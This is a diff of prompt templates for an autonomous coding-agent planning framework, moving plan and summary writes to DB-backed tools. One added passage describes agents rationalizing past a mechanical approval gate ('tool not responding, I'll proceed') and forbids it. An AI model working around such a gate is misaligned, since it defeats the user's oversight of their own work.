+Plan milestone {{milestoneId}} ("{{milestoneTitle}}"). Read `.gsd/DECISIONS.md` if it exists — respect existing decisions. Read `.gsd/REQUIREMENTS.md` if it exists and treat Active requirements as the capability contract. If `REQUIREMENTS.md` is missing, continue in legacy compatibility mode but explicitly note missing requirement coverage. Use the **Roadmap** output template below to shape the milestone planning payload you send to `gsd_plan_milestone`. Call `gsd_plan_milestone` to persist the milestone planning fields and render `{{milestoneId}}-ROADMAP.md` from DB state. Do **not** write `{{milestoneId}}-ROADMAP.md`, `ROADMAP.md`, or other planning artifacts manually. If planning produces structural decisions, append them to `.gsd/DECISIONS.md`. {{skillActivation}} Fill the Horizontal Checklist section with cross-cutting concerns considered during planning (requirements re-read, decisions re-evaluated, graceful shutdown, revenue paths, auth boundary, shared resources, reconnection). Omit for trivial milestones.
 
 ## Requirement Rules
 
@@ -10,10 +10,10 @@ Plan milestone {{milestoneId}} ("{{milestoneTitle}}"). Read `.gsd/DECISIONS.md`
 ## Planning Doctrine
 
 - **Risk-first means proof-first.** The earliest slices should prove the hardest thing works by shipping the real feature through the uncertain path. If auth is the risk, the first slice ships a real login page with real session handling that a user can actually use — not a CLI command that returns "authenticated: true". Proof is the shipped feature working. There is no separate "proof" artifact. Do not plan spikes, proof-of-concept slices, or validation-only slices — the proof is the real feature, built through the risky path.
-- **Every slice is vertical, demoable, and shippable.** Every slice ships real, user-facing functionality. "Demoable" means you could show a stakeholder and they'd see real product progress — not a developer showing a terminal command. If the only way to demonstrate the slice is through a test runner or a curl command, the slice is missing its UI/UX surface. Add it. A slice that only proves something but doesn't ship real working code is not a slice — restructure it.
+- **Every slice is vertical, demoable, and shippable.** Every slice ships real, user-facing functionality. "Demoable" means the intended user can exercise the capability through its real interface — for a web app that's the UI, for a CLI tool that's the terminal, for an API that's a consuming client or curl. The test is: can someone *use* it, not just *assert* it passes. A slice that only proves something but doesn't ship real working code is not a slice — restructure it.
 - **Brownfield bias.** When planning against an existing codebase, ground slices in existing modules, conventions, and seams. Prefer extending real patterns over inventing new ones.
 - **Each slice should establish something downstream slices can depend on.** Think about what stable surface this slice creates for later work — an API, a data shape, a proven integration path.
-- **Avoid foundation-only slices.** If a slice doesn't produce something demoable end-to-end, it's probably a layer, not a vertical slice. Restructure it.
+- **Avoid foundation-only slices.** If a slice doesn't produce something demoable end-to-end, it's probably a layer, not a vertical slice. Restructure it. Exception: if the infrastructure *is* the product surface (a new protocol, extension API, or provider interface), the slice is vertical by definition — the downstream consumer is the demo.
 - **Verification-first.** When planning slices, know what "done" looks like before detailing implementation. Each slice's demo line should describe concrete, verifiable evidence — not vague "it works" claims.
 - **Plan for integrated reality, not just local proof.** Distinguish contract proof from live integration proof. If the milestone involves multiple runtime boundaries, one slice must explicitly prove the assembled system through the real entrypoint or runtime path.
 - **Truthful demo lines only.** If a slice is proven by fixtures or tests only, say so. Do not phrase harness-level proof as if the user can already perform the live end-to-end behavior unless that has actually been exercised.
diff --git a/src/resources/extensions/gsd/prompts/guided-plan-slice.md b/src/resources/extensions/gsd/prompts/guided-plan-slice.md
index 74b3da9be..ca82882fb 100644
--- a/src/resources/extensions/gsd/prompts/guided-plan-slice.md
+++ b/src/resources/extensions/gsd/prompts/guided-plan-slice.md
@@ -1,3 +1,3 @@
-Plan slice {{sliceId}} ("{{sliceTitle}}") of milestone {{milestoneId}}. Read `.gsd/DECISIONS.md` if it exists — respect existing decisions. Read `.gsd/REQUIREMENTS.md` if it exists — identify which Active requirements the roadmap says this slice owns or supports, and ensure the plan delivers them. Read the roadmap boundary map, any existing context/research files, and dependency summaries. Use the **Slice Plan** and **Task Plan** output templates below. Decompose into tasks with must-haves. Fill the `Proof Level` and `Integration Closure` sections truthfully so the plan says what class of proof this slice really delivers and what end-to-end wiring still remains. Write `{{sliceId}}-PLAN.md` and individual `T##-PLAN.md` files in the `tasks/` subdirectory. If planning produces structural decisions, append them to `.gsd/DECISIONS.md`. {{skillActivation}} Before committing, self-audit the plan: every must-have maps to at least one task, every task has complete sections (steps, must-haves, verification, observability impact, inputs, and expected output), task ordering is consistent with no circular references, every pair of artifacts that must connect has an explicit wiring step, task scope targets 2–5 steps and 3–8 files (6–8 steps or 8–10 files — consider splitting; 10+ steps or 12+ files — must split), the plan honors locked decisions from context/research/decisions artifacts, the proof-level wording does not overclaim live integration if only fixture/contract proof is planned, every Active requirement this slice owns has at least one task with verification that proves it is met, and every task produces real user-facing progress — if the slice has a UI surface at least one task builds the real UI, if it has an API at least one task connects it to a real data source, and showing the completed result to a non-technical stakeholder would demonstrate real product progress rather than developer artifacts.
+Plan slice {{sliceId}} ("{{sliceTitle}}") of milestone {{milestoneId}}. Read `.gsd/DECISIONS.md` if it exists — respect existing decisions. Read `.gsd/REQUIREMENTS.md` if it exists — identify which Active requirements the roadmap says this slice owns or supports, and ensure the plan delivers them. Read the roadmap boundary map, any existing context/research files, and dependency summaries. Use the **Slice Plan** and **Task Plan** output templates below. Decompose into tasks with must-haves. Fill the `Proof Level` and `Integration Closure` sections truthfully so the plan says what class of proof this slice really delivers and what end-to-end wiring still remains. Call `gsd_plan_slice` to persist the slice plan — the tool writes `{{sliceId}}-PLAN.md` and individual `T##-PLAN.md` files to disk and persists to DB. Do **not** write plan files manually — use the DB-backed tool so state stays consistent. If planning produces structural decisions, call `gsd_decision_save` for each — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically. {{skillActivation}} Before finishing, self-audit the plan: every must-have maps to at least one task, every task has complete sections (steps, must-haves, verification, observability impact, inputs, and expected output), task ordering is consistent with no circular references, every pair of artifacts that must connect has an explicit wiring step, task scope targets 2–5 steps and 3–8 files (6–8 steps or 8–10 files — consider splitting; 10+ steps or 12+ files — must split), the plan honors locked decisions from context/research/decisions artifacts, the proof-level wording does not overclaim live integration if only fixture/contract proof is planned, every Active requirement this slice owns has at least one task with verification that proves it is met, and every task produces real user-facing progress — if the slice has a UI surface at least one task builds the real UI, if it has an API at least one task connects it to a real data source, and showing the completed result to a non-technical stakeholder would demonstrate real product progress rather than developer artifacts, and quality gate coverage — for non-trivial slices, Threat Surface (Q3: abuse, data exposure, input trust) and Requirement Impact (Q4: requirements touched, re-verify, decisions revisited) sections are present. For non-trivial tasks, Failure Modes (Q5), Load Profile (Q6), and Negative Tests (Q7) are filled in task plans.
 
 {{inlinedTemplates}}
diff --git a/src/resources/extensions/gsd/prompts/guided-research-slice.md b/src/resources/extensions/gsd/prompts/guided-research-slice.md
index 815a7bb19..93710a860 100644
--- a/src/resources/extensions/gsd/prompts/guided-research-slice.md
+++ b/src/resources/extensions/gsd/prompts/guided-research-slice.md
@@ -1,4 +1,4 @@
-Research slice {{sliceId}} ("{{sliceTitle}}") of milestone {{milestoneId}}. Read `.gsd/DECISIONS.md` if it exists — respect existing decisions, don't contradict them. Read `.gsd/REQUIREMENTS.md` if it exists — identify which Active requirements this slice owns or supports and target research toward risks, unknowns, and constraints that could affect delivery of those requirements. {{skillActivation}} Explore the relevant code — use `rg`/`find` for targeted reads, or `scout` if the area is broad or unfamiliar. Check libraries with `resolve_library`/`get_library_docs` — skip this for libraries already used in the codebase. Use the **Research** output template below. Write `{{sliceId}}-RESEARCH.md` in the slice directory.
+Research slice {{sliceId}} ("{{sliceTitle}}") of milestone {{milestoneId}}. Read `.gsd/DECISIONS.md` if it exists — respect existing decisions, don't contradict them. Read `.gsd/REQUIREMENTS.md` if it exists — identify which Active requirements this slice owns or supports and target research toward risks, unknowns, and constraints that could affect delivery of those requirements. {{skillActivation}} Explore the relevant code — use `rg`/`find` for targeted reads, or `scout` if the area is broad or unfamiliar. Check libraries with `resolve_library`/`get_library_docs` — skip this for libraries already used in the codebase. Use the **Research** output template below. Call `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `slice_id: {{sliceId}}`, `artifact_type: "RESEARCH"`, and the research content — the tool writes the file to disk and persists to DB.
 
 **You are the scout.** A planner agent reads your output in a fresh context to decompose this slice into tasks. Write for the planner — surface key files, where the work divides naturally, what to build first, and how to verify. If the research doc is vague, the planner re-explores code you already read. If it's precise, the planner decomposes immediately.
 
diff --git a/src/resources/extensions/gsd/prompts/parallel-research-slices.md b/src/resources/extensions/gsd/prompts/parallel-research-slices.md
new file mode 100644
index 000000000..22c18d9f6
--- /dev/null
+++ b/src/resources/extensions/gsd/prompts/parallel-research-slices.md
@@ -0,0 +1,23 @@
+# Parallel Slice Research
+
+You are dispatching parallel research agents for **{{sliceCount}} slices** in milestone **{{mid}} — {{midTitle}}**.
+
+## Slices to Research
+
+{{sliceList}}
+
+## Mission
+
+Dispatch ALL slices simultaneously using the `subagent` tool in **parallel mode**. Each subagent will independently research its slice and write a RESEARCH file.
+
+## Execution Protocol
+
+1. Call `subagent` with `tasks: [...]` containing one entry per slice below
+2. Wait for ALL subagents to complete
+3. Verify each slice's RESEARCH file was written (check the `.gsd/{{mid}}/` directory)
+4. If any subagent failed to write its RESEARCH file, re-run it individually
+5. Report which slices completed research and which (if any) failed
+
+## Subagent Prompts
+
+{{subagentPrompts}}
diff --git a/src/resources/extensions/gsd/prompts/plan-milestone.md b/src/resources/extensions/gsd/prompts/plan-milestone.md
index f0f3b8613..34b0cea4b 100644
--- a/src/resources/extensions/gsd/prompts/plan-milestone.md
+++ b/src/resources/extensions/gsd/prompts/plan-milestone.md
@@ -47,8 +47,8 @@ Then:
 2. {{skillActivation}}
 3. Create the roadmap: decompose into demoable vertical slices — as many as the work genuinely needs, no more. A simple feature might be 1 slice. Don't decompose for decomposition's sake.
 4. Order by risk (high-risk first)
-5. Write `{{outputPath}}` with checkboxes, risk, depends, demo sentences, proof strategy, verification classes, milestone definition of done, **requirement coverage**, and a boundary map. Write success criteria as observable truths, not implementation tasks. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice that proves the assembled system works end-to-end in a real environment
-6. If planning produced structural decisions (e.g. slice ordering rationale, technology choices, scope exclusions), append them to `.gsd/DECISIONS.md` (use the **Decisions** output template from the inlined context above if the file doesn't exist yet)
+5. Call `gsd_plan_milestone` to persist the milestone planning fields, slice rows, and **horizontal checklist** in the DB-backed planning path. Do **not** write `{{outputPath}}`, `ROADMAP.md`, or other planning artifacts manually — the planning tool owns roadmap rendering and persistence.
+6. If planning produced structural decisions (e.g. slice ordering rationale, technology choices, scope exclusions), call `gsd_decision_save` for each decision — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
 
 ## Requirement Mapping Rules
 
@@ -64,10 +64,10 @@ Then:
 Apply these when decomposing and ordering slices:
 
 - **Risk-first means proof-first.** The earliest slices should prove the hardest thing works by shipping the real feature through the uncertain path. If auth is the risk, the first slice ships a real login page with real session handling that a user can actually use — not a CLI command that returns "authenticated: true". Proof is the shipped feature working. There is no separate "proof" artifact. Do not plan spikes, proof-of-concept slices, or validation-only slices — the proof is the real feature, built through the risky path.
-- **Every slice is vertical, demoable, and shippable.** Every slice ships real, user-facing functionality. "Demoable" means you could show a stakeholder and they'd see real product progress — not a developer showing a terminal command. If the only way to demonstrate the slice is through a test runner or a curl command, the slice is missing its UI/UX surface. Add it. A slice that only proves something but doesn't ship real working code is not a slice — restructure it.
+- **Every slice is vertical, demoable, and shippable.** Every slice ships real, user-facing functionality. "Demoable" means the intended user can exercise the capability through its real interface — for a web app that's the UI, for a CLI tool that's the terminal, for an API that's a consuming client or curl. The test is: can someone *use* it, not just *assert* it passes. A slice that only proves something but doesn't ship real working code is not a slice — restructure it.
 - **Brownfield bias.** When planning against an existing codebase, ground slices in existing modules, conventions, and seams. Prefer extending real patterns over inventing new ones.
 - **Each slice should establish something downstream slices can depend on.** Think about what stable surface this slice creates for later work — an API, a data shape, a proven integration path.
-- **Avoid foundation-only slices.** If a slice doesn't produce something demoable end-to-end, it's probably a layer, not a vertical slice. Restructure it.
+- **Avoid foundation-only slices.** If a slice doesn't produce something demoable end-to-end, it's probably a layer, not a vertical slice. Restructure it. Exception: if the infrastructure *is* the product surface (a new protocol, extension API, or provider interface), the slice is vertical by definition — the downstream consumer is the demo.
 - **Verification-first.** When planning slices, know what "done" looks like before detailing implementation. Each slice's demo line should describe concrete, verifiable evidence — not vague "it works" claims.
 - **Plan for integrated reality, not just local proof.** Distinguish contract proof from live integration proof. If the milestone involves multiple runtime boundaries, one slice must explicitly prove the assembled system through the real entrypoint or runtime path.
 - **Truthful demo lines only.** If a slice is proven by fixtures or tests only, say so. Do not phrase harness-level proof as if the user can already perform the live end-to-end behavior unless that has actually been exercised.
@@ -80,15 +80,13 @@ Apply these when decomposing and ordering slices:
 
 ## Single-Slice Fast Path
 
-If the roadmap has only one slice, also write the slice plan and task plans inline during this unit — don't leave them for a separate planning session.
+If the roadmap has only one slice, also plan the slice and its tasks inline during this unit — don't leave them for a separate planning session.
 
-1. Use the **Slice Plan** and **Task Plan** output templates from the inlined context above
-2. `mkdir -p {{milestonePath}}/slices/S01/tasks`
-3. Write the S01 plan file at `{{milestonePath}}/slices/S01/S01-PLAN.md`
-4. Write individual task plans at `{{milestonePath}}/slices/S01/tasks/T01-PLAN.md`, etc.
-5. For simple slices, keep the plan lean — omit Proof Level, Integration Closure, and Observability sections if they would all be "none". Executable verification commands are sufficient.
+1. After `gsd_plan_milestone` returns, immediately call `gsd_plan_slice` for S01 with the full task breakdown
+2. Use the **Slice Plan** and **Task Plan** output templates from the inlined context above to structure the tool call parameters
+3. For simple slices, keep the plan lean — omit Proof Level, Integration Closure, and Observability sections if they would all be "none". Executable verification commands are sufficient.
 
-This eliminates a separate research-slice + plan-slice cycle when the work is straightforward.
+Do **not** write plan files manually — use the DB-backed tools so state stays consistent.
 
 ## Secret Forecasting
 
@@ -107,6 +105,4 @@ If this milestone requires any external API keys or secrets:
 
 If this milestone does not require any external API keys or secrets, skip this step entirely — do not create an empty manifest.
 
-**You MUST write the file `{{outputPath}}` before finishing.**
-
 When done, say: "Milestone {{milestoneId}} planned."
diff --git a/src/resources/extensions/gsd/prompts/plan-slice.md b/src/resources/extensions/gsd/prompts/plan-slice.md
index bf18e0fee..69e103f72 100644
--- a/src/resources/extensions/gsd/prompts/plan-slice.md
+++ b/src/resources/extensions/gsd/prompts/plan-slice.md
@@ -57,14 +57,17 @@ Then:
    - Include `Observability / Diagnostics` for backend, integration, async, stateful, or UI slices where failure diagnosis matters.
    - Fill `Proof Level` and `Integration Closure` when the slice crosses runtime boundaries or has meaningful integration concerns.
    - **Omit these sections entirely for simple slices** where they would all be "none" or trivially obvious.
-5. Decompose the slice into tasks, each fitting one context window. Each task needs:
+5. **Quality gates** — for non-trivial slices, fill the Threat Surface (Q3) and Requirement Impact (Q4) sections in the slice plan:
+   - **Threat Surface:** Identify abuse scenarios, data exposure risks, and input trust boundaries. Required when the slice handles user input, authentication, authorization, or sensitive data. Omit entirely for internal refactoring or simple changes.
+   - **Requirement Impact:** List which existing requirements this slice touches, what must be re-verified after shipping, and which prior decisions should be reconsidered. Omit entirely if no existing requirements are affected.
+   - For each task in a non-trivial slice, fill Failure Modes (Q5), Load Profile (Q6), and Negative Tests (Q7) in the task plan when the task has external dependencies, shared resources, or non-trivial input handling. Omit for simple tasks.
+6. Decompose the slice into tasks, each fitting one context window. Each task needs:
    - a concrete, action-oriented title
    - the inline task entry fields defined in the plan.md template (Why / Files / Do / Verify / Done when)
    - a matching task plan file with description, steps, must-haves, verification, inputs, and expected output
    - **Inputs and Expected Output must list concrete backtick-wrapped file paths** (e.g. `` `src/types.ts` ``). These are machine-parsed to derive task dependencies — vague prose without paths breaks parallel execution. Every task must have at least one output file path.
    - Observability Impact section **only if the task touches runtime boundaries, async flows, or error paths** — omit it otherwise
-6. Write `{{outputPath}}`
-7. Write individual task plans in `{{slicePath}}/tasks/`: `T01-PLAN.md`, `T02-PLAN.md`, etc.
+7. **Persist planning state through `gsd_plan_slice`.** Call it with the full slice planning payload (goal, demo, must-haves, verification, tasks, and metadata). The tool inserts all tasks in the same transaction, writes to the DB, and renders `{{outputPath}}` and `{{slicePath}}/tasks/T##-PLAN.md` files automatically. Do **not** call `gsd_plan_task` separately — `gsd_plan_slice` handles task persistence. Do **not** rely on direct `PLAN.md` writes as the source of truth; the DB-backed tool is the canonical write path for slice and task planning state.
 8. **Self-audit the plan.** Walk through each check — if any fail, fix the plan files before moving on:
     - **Completion semantics:** If every task were completed exactly as written, the slice goal/demo should actually be true.
     - **Requirement coverage:** Every must-have in the slice maps to at least one task. No must-have is orphaned. If `REQUIREMENTS.md` exists, every Active requirement this slice owns maps to at least one task.
@@ -73,11 +76,14 @@ Then:
     - **Key links planned:** For every pair of artifacts that must connect, there is an explicit step that wires them.
     - **Scope sanity:** Target 2–5 steps and 3–8 files per task. 10+ steps or 12+ files — must split. Each task must be completable in a single fresh context window.
     - **Feature completeness:** Every task produces real, user-facing progress — not just internal scaffolding.
-9. If planning produced structural decisions, append them to `.gsd/DECISIONS.md`
-10. {{commitInstruction}}
+    - **Quality gate coverage:** For non-trivial slices, Threat Surface and Requirement Impact sections are present and specific (not placeholder text). For non-trivial tasks, Failure Modes, Load Profile, and Negative Tests are addressed in the task plan.
+10. If planning produced structural decisions, append them to `.gsd/DECISIONS.md`
+11. {{commitInstruction}}
 
 The slice directory and tasks/ subdirectory already exist. Do NOT mkdir. All work stays in your working directory: `{{workingDirectory}}`.
 
-**You MUST write the file `{{outputPath}}` before finishing.**
+**Autonomous execution:** Do not call `ask_user_questions` or `secure_env_collect`. You are running in auto-mode — there is no human available to answer questions. Make reasonable assumptions and document them in the plan. If a decision genuinely requires human input, write a note in the relevant task's description and call `gsd_plan_slice` with what you have.
+
+**You MUST call `gsd_plan_slice` to persist the planning state before finishing.**
 
 When done, say: "Slice {{sliceId}} planned."
diff --git a/src/resources/extensions/gsd/prompts/queue.md b/src/resources/extensions/gsd/prompts/queue.md
index 15d8deb08..5bbdd7b2a 100644
--- a/src/resources/extensions/gsd/prompts/queue.md
+++ b/src/resources/extensions/gsd/prompts/queue.md
@@ -8,7 +8,7 @@ Before asking "What do you want to add?", check the existing milestones context
 
 1. Tell the user which milestones have draft contexts and briefly summarize what each draft contains (read the draft file).
 2. Use `ask_user_questions` to ask per-draft milestone:
-   - **"Discuss now"** — Treat this draft as the primary topic. Read the draft content, use it as seed material, and conduct a focused discussion following the standard discussion flow (reflection → investigation → questioning → depth verification → requirements → roadmap). After the discussion, write the full CONTEXT.md and delete the `CONTEXT-DRAFT.md` file. The milestone is then ready for auto-planning.
+   - **"Discuss now"** — Treat this draft as the primary topic. Read the draft content, use it as seed material, and conduct a focused discussion following the standard discussion flow (reflection → investigation → questioning → depth verification → requirements → roadmap). After the discussion, call `gsd_summary_save` with the milestone ID and `artifact_type: "CONTEXT"` to write the full context — then delete the `CONTEXT-DRAFT.md` file. The milestone is then ready for auto-planning.
    - **"Leave for later"** — Keep the draft as-is. The user will discuss it in a future session. Auto-mode will continue to pause when it reaches this milestone.
 3. Handle all draft discussions before proceeding to new queue work.
 4. If no drafts exist in the context, skip this section entirely and proceed to "What do you want to add?"
@@ -103,12 +103,14 @@ The user confirms or corrects before you write. One depth verification per miles
 
 **If you skip this step, the system will block the CONTEXT.md write and return an error telling you to complete verification first.**
 
+**CRITICAL — Non-bypassable gate:** The system mechanically blocks CONTEXT.md writes until the user selects the "(Recommended)" option. If the user declines, cancels, or the tool fails, you MUST re-ask — never rationalize past the block ("tool not responding, I'll proceed" is forbidden). The gate exists to protect the user's work; treat a block as an instruction, not an obstacle to work around.
+
 ## Output Phase
 
 Once the user is satisfied, in a single pass for **each** new milestone:
 
 1. Call `gsd_milestone_generate_id` to get the milestone ID — never invent milestone IDs manually. Then `mkdir -p .gsd/milestones/<ID>/slices`.
-2. Write `.gsd/milestones/<ID>/<ID>-CONTEXT.md` — use the **Context** output template below. Capture intent, scope, risks, constraints, integration points, and relevant requirements. Mark the status as "Queued — pending auto-mode execution." **If this milestone depends on other milestones, add YAML frontmatter with `depends_on`:**
+2. Call `gsd_summary_save` with `milestone_id: <ID>`, `artifact_type: "CONTEXT"`, and the full context markdown as `content` — the tool computes the file path and persists to both DB and disk. Capture intent, scope, risks, constraints, integration points, and relevant requirements in the content. Mark the status as "Queued — pending auto-mode execution." **If this milestone depends on other milestones, include YAML frontmatter with `depends_on` in the content:**
    ```yaml
    ---
    depends_on: [M001, M002]
diff --git a/src/resources/extensions/gsd/prompts/quick-task.md b/src/resources/extensions/gsd/prompts/quick-task.md
index 8c161cad2..deae928c4 100644
--- a/src/resources/extensions/gsd/prompts/quick-task.md
+++ b/src/resources/extensions/gsd/prompts/quick-task.md
@@ -21,7 +21,9 @@ You are executing a GSD quick task — a lightweight, focused unit of work outsi
    - Use conventional commit messages (feat:, fix:, refactor:, etc.)
    - Stage only relevant files — never commit secrets or runtime files.
    - Commit logical units separately if the task involves distinct changes.
+   - Quick tasks run outside the auto-mode lifecycle — there is no system auto-commit, so commit directly here.
 7. Write a brief summary to `{{summaryPath}}`:
+   - Quick tasks operate outside the milestone/slice/task DB structure, so `gsd_summary_save` (which requires a `milestone_id`) cannot be used here. Write the file directly.
 
 ```markdown
 # Quick Task: {{description}}
diff --git a/src/resources/extensions/gsd/prompts/reactive-execute.md b/src/resources/extensions/gsd/prompts/reactive-execute.md
index 53e7ef52e..b0bbdd724 100644
--- a/src/resources/extensions/gsd/prompts/reactive-execute.md
+++ b/src/resources/extensions/gsd/prompts/reactive-execute.md
@@ -8,7 +8,7 @@
 
 You are executing **multiple tasks in parallel** for this slice. The task graph below shows which tasks are ready for simultaneous execution based on their input/output dependencies.
 
-**Critical rule:** Use the `subagent` tool in **parallel mode** to dispatch all ready tasks simultaneously. Each subagent gets a full `execute-task` prompt and is responsible for its own implementation, verification, task summary, and checkbox updates. The parent batch agent orchestrates, verifies, and records failures only when a dispatched task failed before it could leave its own summary behind.
+**Critical rule:** Use the `subagent` tool in **parallel mode** to dispatch all ready tasks simultaneously. Each subagent gets a full `execute-task` prompt and is responsible for its own implementation, verification, task summary, and completion tool calls. The parent batch agent orchestrates, verifies, and records failures only when a dispatched task failed before it could leave its own summary behind.
 
 ## Task Dependency Graph
 
@@ -25,14 +25,14 @@ You are executing **multiple tasks in parallel** for this slice. The task graph
 1. **Dispatch all ready tasks** using `subagent` in parallel mode. Each subagent prompt is provided below.
 2. **Wait for all subagents** to complete.
 3. **Verify each dispatched task's outputs** — check that expected files were created/modified, that verification commands pass where applicable, and that each task wrote its own `T##-SUMMARY.md`.
-4. **Do not rewrite successful task summaries or duplicate checkbox edits.** Treat a subagent-written summary as authoritative for that task.
-5. **If a failed task produced no summary, write a recovery summary for that task** with `blocker_discovered: true`, clear failure details, and leave the task unchecked so replan/retry has an authoritative record.
+4. **Do not rewrite successful task summaries or duplicate completion tool calls.** Treat a subagent-written summary as authoritative for that task.
+5. **If a failed task produced no summary, call `gsd_summary_save`** with `milestone_id: {{milestoneId}}`, `slice_id: {{sliceId}}`, the failed task's `task_id`, and `artifact_type: "SUMMARY"` — include `blocker_discovered: true` and clear failure details in the `content`. Do NOT call `gsd_task_complete` for the failed task — leave it uncompleted so replan/retry has an authoritative record.
 6. **Preserve successful sibling tasks exactly as they landed.** Do not roll back good work because another parallel task failed.
 7. **Do NOT create a batch commit.** The surrounding unit lifecycle owns commits; this parent batch agent should not invent a second commit layer.
 8. **Report the batch outcome** — which tasks succeeded, which failed, and any output collisions or dependency surprises.
 
 If any subagent fails:
-- Keep successful task summaries and checkbox updates as-is
+- Keep successful task summaries and completion tool calls as-is
 - Write a failure summary only when the failed task did not leave one behind
 - Do not silently discard or overwrite another task's outputs
 - The orchestrator will handle re-dispatch or replanning on the next iteration
diff --git a/src/resources/extensions/gsd/prompts/reassess-roadmap.md b/src/resources/extensions/gsd/prompts/reassess-roadmap.md
index 7abde3259..64b2a6d65 100644
--- a/src/resources/extensions/gsd/prompts/reassess-roadmap.md
+++ b/src/resources/extensions/gsd/prompts/reassess-roadmap.md
@@ -36,6 +36,9 @@ Ask yourself:
 - Did assumptions in remaining slice descriptions turn out wrong?
 - If `.gsd/REQUIREMENTS.md` exists: did this slice validate, invalidate, defer, block, or newly surface requirements?
 - If `.gsd/REQUIREMENTS.md` exists: does the remaining roadmap still provide credible coverage for Active requirements, including launchability, primary user loop, continuity, and failure visibility where relevant?
+- Are the Threat Surface and Requirement Impact sections in completed slice plans still accurate for remaining slices?
+- Did this slice's Operational Readiness reveal monitoring gaps that remaining slices should address?
+- Should any Horizontal Checklist items be updated based on what was actually built?
 
 ### Success-Criterion Coverage Check
 
@@ -50,15 +53,16 @@ If all criteria have at least one remaining owning slice, the coverage check pas
 
 **If the roadmap is still good:**
 
-Write `{{assessmentPath}}` with a brief confirmation that roadmap coverage still holds after {{completedSliceId}}. If requirements exist, explicitly note whether requirement coverage remains sound.
+Use `gsd_reassess_roadmap` with `verdict: "roadmap-confirmed"`, an empty `sliceChanges` object, and the assessment text — the tool writes the assessment to the DB and renders `{{assessmentPath}}`. If requirements exist, explicitly note whether requirement coverage remains sound.
 
 **If changes are needed:**
 
-1. Rewrite the remaining (unchecked) slices in `{{roadmapPath}}`. Keep completed slices exactly as they are (`[x]`). Update the boundary map for changed slices. Update the proof strategy if risks changed. Update requirement coverage if ownership or scope changed.
-2. Write `{{assessmentPath}}` explaining what changed and why — keep it brief and concrete.
-3. If `.gsd/REQUIREMENTS.md` exists and requirement ownership or status changed, update it.
-4. {{commitInstruction}}
+**Persist changes through `gsd_reassess_roadmap`.** Pass: `milestoneId`, `completedSliceId`, `verdict` (e.g. "roadmap-adjusted"), `assessment` (text explaining the decision), and `sliceChanges` with `modified` (array of sliceId, title, risk, depends, demo), `added` (same shape), `removed` (array of slice ID strings). The tool structurally enforces preservation of completed slices, writes the assessment to the DB, re-renders `{{roadmapPath}}`, and renders `{{assessmentPath}}`.
 
-**You MUST write the file `{{assessmentPath}}` before finishing.**
+If `.gsd/REQUIREMENTS.md` exists and requirement ownership or status changed, update it.
+
+{{commitInstruction}}
+
+**DB access safety:** Do NOT query `.gsd/gsd.db` directly via `sqlite3` or `node -e require('better-sqlite3')`. Use `gsd_milestone_status` to read current milestone and slice state. All roadmap mutations go through `gsd_reassess_roadmap` — the tool writes to the DB and re-renders ROADMAP.md atomically.
 
 When done, say: "Roadmap reassessed."
diff --git a/src/resources/extensions/gsd/prompts/replan-slice.md b/src/resources/extensions/gsd/prompts/replan-slice.md
index 3922024e0..e2348407c 100644
--- a/src/resources/extensions/gsd/prompts/replan-slice.md
+++ b/src/resources/extensions/gsd/prompts/replan-slice.md
@@ -32,19 +32,8 @@ Consider these captures when rewriting the remaining tasks — they represent th
 
 1. Read the blocker task summary carefully. Understand exactly what was discovered and why it blocks the current plan.
 2. Analyze the remaining `[ ]` tasks in the slice plan. Determine which are still valid, which need modification, and which should be replaced.
-3. Write `{{replanPath}}` documenting:
-   - What blocker was discovered and in which task
-   - What changed in the plan and why
-   - Which incomplete tasks were modified, added, or removed
-   - Any new risks or considerations introduced by the replan
-4. Rewrite `{{planPath}}` with the updated slice plan:
-   - Keep all `[x]` tasks exactly as they were (same IDs, same descriptions, same checkmarks)
-   - Update the `[ ]` tasks to address the blocker
-   - Ensure the slice Goal and Demo sections are still achievable with the new tasks, or update them if the blocker fundamentally changes what the slice can deliver
-   - Update the Files Likely Touched section if the replan changes which files are affected
-5. If any incomplete task had a `T0x-PLAN.md`, remove or rewrite it to match the new task description.
-6. Do not commit manually — the system auto-commits your changes after this unit completes.
-
-**You MUST write `{{replanPath}}` and the updated slice plan before finishing.**
+3. **Persist replan state through `gsd_replan_slice`.** Call it with: `milestoneId`, `sliceId`, `blockerTaskId`, `blockerDescription`, `whatChanged`, `updatedTasks` (array of task objects with taskId, title, description, estimate, files, verify, inputs, expectedOutput), `removedTaskIds` (array of task ID strings). The tool structurally enforces preservation of completed tasks, writes replan history to the DB, re-renders `{{planPath}}`, and renders `{{replanPath}}`. Preserve or update the Threat Surface and Requirement Impact sections if the replan changes the slice's security posture or requirement coverage.
+4. If any incomplete task had a `T0x-PLAN.md`, remove or rewrite it to match the new task description.
+5. Do not commit manually — the system auto-commits your changes after this unit completes.
 
 When done, say: "Slice {{sliceId}} replanned."
diff --git a/src/resources/extensions/gsd/prompts/research-milestone.md b/src/resources/extensions/gsd/prompts/research-milestone.md
index 9d4b435d3..9276eb4a2 100644
--- a/src/resources/extensions/gsd/prompts/research-milestone.md
+++ b/src/resources/extensions/gsd/prompts/research-milestone.md
@@ -28,7 +28,7 @@ Then research the codebase and relevant technologies. Narrate key findings and s
 5. **Web search budget:** You have a limited budget of web searches (max ~15 per session). Use them strategically — prefer `resolve_library` / `get_library_docs` for library documentation. Do NOT repeat the same or similar queries. If a search didn't find what you need, rephrase once or move on. Target 3-5 total web searches for a typical research unit.
 6. Use the **Research** output template from the inlined context above — include only sections that have real content
 7. If `.gsd/REQUIREMENTS.md` exists, research against it. Identify which Active requirements are table stakes, likely omissions, overbuilt risks, or domain-standard behaviors the user may or may not want.
-8. Write `{{outputPath}}`
+8. Call `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `artifact_type: "RESEARCH"`, and the full research markdown as `content` — the tool computes the file path and persists to both DB and disk.
 
 ## Strategic Questions to Answer
 
@@ -42,6 +42,6 @@ Then research the codebase and relevant technologies. Narrate key findings and s
 
 **Research is advisory, not auto-binding.** Surface candidate requirements clearly instead of silently expanding scope.
 
-**You MUST write the file `{{outputPath}}` before finishing.**
+**You MUST call `gsd_summary_save` with the research content before finishing.**
 
 When done, say: "Milestone {{milestoneId}} researched."
diff --git a/src/resources/extensions/gsd/prompts/research-slice.md b/src/resources/extensions/gsd/prompts/research-slice.md
index a5aaf14c3..7aff00ee8 100644
--- a/src/resources/extensions/gsd/prompts/research-slice.md
